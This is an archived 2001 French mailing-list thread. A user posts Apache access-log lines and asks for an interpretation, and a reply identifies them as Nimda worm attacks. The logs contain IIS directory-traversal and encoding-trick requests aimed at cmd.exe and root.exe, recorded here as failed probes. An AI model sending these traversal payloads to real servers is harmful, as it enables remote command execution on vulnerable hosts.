Réf. : Logs apache

Top Page

Reply to this message
Author: cyril.marchal
Date:  
To: cbaillon
CC: guilde
Subject: Réf. : Logs apache

salut ,

on dirait bien des attaques du virus NIMDA...

a+


Cyril MARCHAL - Tél : 02-48-57-69-54
Administrateur systèmes et réseaux
Caisse d'Allocations Familiales du Cher
------------------------------------------------------------



                    Christophe                                                                                                      
                    Baillon                  Pour :  guilde@???                                                                 
                    <cbaillon@ifrance        cc :                                                                                   
                    .com>                    Objet :      Logs apache                                                               


                    15/10/01 19:01                                                                                                  


                    |---------------|                                                                                               
                    | [ ] Accusé de |                                                                                               
                    |     réception |                                                                                               
                    |---------------|                                                                                               
                    |---------------|                                                                                               
                    | [ ] Détailler |                                                                                               
                    |     le groupe |                                                                                               
                    |---------------|                                                                                               






Bonjour,

Dans les logs de mon serveur apache ,
j'ai plusieurs centaines de lignes dont voici un extrait :

217.128.35.115 - - [15/Oct/2001:17:07:54 +0200] "GET
/msadc/..%255c../..%255c../
..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
404 265
217.128.35.115 - - [15/Oct/2001:17:07:55 +0200] "GET
/scripts/..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 231
217.128.35.115 - - [15/Oct/2001:17:07:56 +0200] "GET
/scripts/..%c0%2f../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 231
217.128.35.115 - - [15/Oct/2001:17:07:56 +0200] "GET
/scripts/..%c0%af../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 231
217.128.35.115 - - [15/Oct/2001:17:07:56 +0200] "GET
/scripts/..%c1%9c../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 231
217.128.35.115 - - [15/Oct/2001:17:07:57 +0200] "GET
/scripts/..%%35%63../winnt/
system32/cmd.exe?/c+dir HTTP/1.0" 400 215
217.128.35.115 - - [15/Oct/2001:17:07:57 +0200] "GET
/scripts/..%%35c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 400 215
217.128.67.58 - - [15/Oct/2001:17:09:42 +0200] "GET
/scripts/root.exe?/c+dir

J'en ai plein, avec plein d'adresses IP differentes, et y en a environ
toutes
les 10 minutes !

J'en déduis que c'est des gens qui pensent que mon serveur est sous nt et
qui
tentent de profiter d'un trou de sécurité connu ?

Quelqu'un peut-il donner une interprétation de ces logs ?

merci .


______________________________________________________________________________

ifrance.com, l'email gratuit le plus complet de l'Internet !
vos emails depuis un navigateur, en POP3, sur Minitel, sur le WAP...
http://www.ifrance.com/_reloc/email.emailif